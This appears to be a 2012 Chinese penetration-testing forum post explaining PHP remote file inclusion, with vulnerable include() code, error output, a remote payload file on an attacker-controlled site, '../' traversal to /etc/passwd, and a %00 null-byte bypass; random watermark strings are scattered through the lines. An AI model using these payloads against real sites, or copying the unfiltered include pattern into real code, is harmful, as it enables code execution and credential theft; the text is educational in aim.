中国网络渗透测试联盟

标题: PHP远程包含 [打印本页]
作者: admin    时间: 2012-9-15 14:06
标题: PHP远程包含

0 W) m8 w: J7 f- _; |4 B8 ^php远端档包含漏洞基本
5 C0 K* N; s: ~6 C" z这篇文章里我会告诉php远程档包含漏洞的原理,初涉程式师的人必看。; @3 ^3 s- t) }3 ]
本帖隐藏的内容需要回复才可以浏览
5 u5 ?$ l2 s" t! t$ e7 ~7 D$ Z首先的问题是,什么才是”远程档包含漏洞“?简要的回答是伺服器通过php的任意档包含过滤不严,从而去执行一个恶意档,这是个程式师过滤上的问题,请记住,所有的cgi程式都有这样的bug。
7 {6 o/ Q% C5 L- N1.找出bug:
7 ~) d- h: P5 b为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的档。在php里,我们使用include()函数,它的工作流程:
7 K7 u. A) Z, w& k7 }* k如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。6 F* r  B' l4 |& j/ U
我们先看这个,当用户输入通过后就包含档,也就是2 f, k% b$ i& t' c3 }; l
if ($_GET) {0 @+ B4 d. B# I8 ?
include $_GET;
* h" R' S' J5 D" K7 g1 K} else {
3 C, h0 `9 s4 b/ ^; [# t  W8 W" Xinclude "home.php";
3 ]& j$ n8 m; V7 u$ h0 i}6 }: }$ L3 z" N
这种结构在动态网站里是常见的,问题是它允许这样http://www.target.com /explame.php?page=main.php或者http://www.target.com/explame.php? page=downloads.php来查看。无论如何,如果你的程式里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,档包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程式师依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。6 O2 x7 y% @7 p. w$ ]
2.测试/ O- g5 W. Q2 K  c& n
这里有个远端档包含的例子,目的只有一个,为了你的程式安全,我们来看具体的
0 @6 F. Z' Q6 Khttp://www.target.com/explame.php?page=zizzy
: B, L% O) P3 u8 A9 KWarning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3- \7 j+ X- z3 Z7 w- b7 G
Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 3
, M5 S1 @$ {6 |' K" X  H( Y  k9 X/ Vphp输出的这些错误资讯告诉我们,程式去包含档/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的档,现在理解了吧。4 P7 `  w8 w6 I0 i: D! m3 S
3.利用$ E/ N; x, _4 F
php确实很好,可以远端调用档,那我创建一个yeah.txt,放在我的站上http://www.mysite.com/yeah.txt.内容这样
$ ~; j0 P$ b0 Z$ w3 @<?+ I4 Q' f# I5 o% u' I% U4 m
echo "Wow,test!";
2 g+ w: s, W( |. v) d& W?>
5 i! H. f+ _2 Q% i* z! P1 m那么http://www.target.com/explame.php?pa...e.com/yeah.txt- _7 M+ n* ^) s: f
OK,回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成<? phpinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../.. /../../etc/passwd。知道什么叫真正的包含了吧。
2 Y- I  e$ M  A9 [6 [7 p% C4 ~4.另一种
9 q0 l$ s3 |, v( h# U% P) P有时程式师换种写法,写成这样,限制了包含范围
3 l% W5 F7 Z) D1 k# p4 F8 a2 gif ($_GET) {: T1 s5 D5 S6 n: g7 m4 S
include "$_GET.php";
) i/ \* u5 p& B- _  w. B( _; A} else {
9 L) {$ ?& Z  \' \0 O, A9 hinclude "home.php";: ?, Y% F1 q* v3 ^: h$ M
}
2 d- G; Z! M3 T7 ]- I6 B7 {我们提交http://www.target.com/explame.php?pa...e.com/yeah.txt" i; }* O" ?0 L1 |% h& X5 Y2 w
Warning: main(http://www.mysite.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3
1 a) X  l4 t7 c2 t; AWarning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs /explame.php on line 3
' P, {- S7 _( T  w* F包含失败了,限制了尾码名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了$ N0 [) z, S. w" x" {4 q
那passwd怎么办
( a1 }& Y( Y6 k0 m$ P% yWarning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var /www/htdocs/explame.php on line 3
, j  A" l3 q2 ^1 yWarning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib /php') in /var/www/htdocs/explame.php on line 3
2 l: T* \3 G3 ]1 }+ ]& ~在这里使用个NUL字元,也就是%00来跳过检测
' ?; }: I! a# O+ k  k- {7 Khttp://www.target.com/explame.php?pa.../etc/passwd%00
' [/ J6 {% [# Y0 N0 c7 W



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2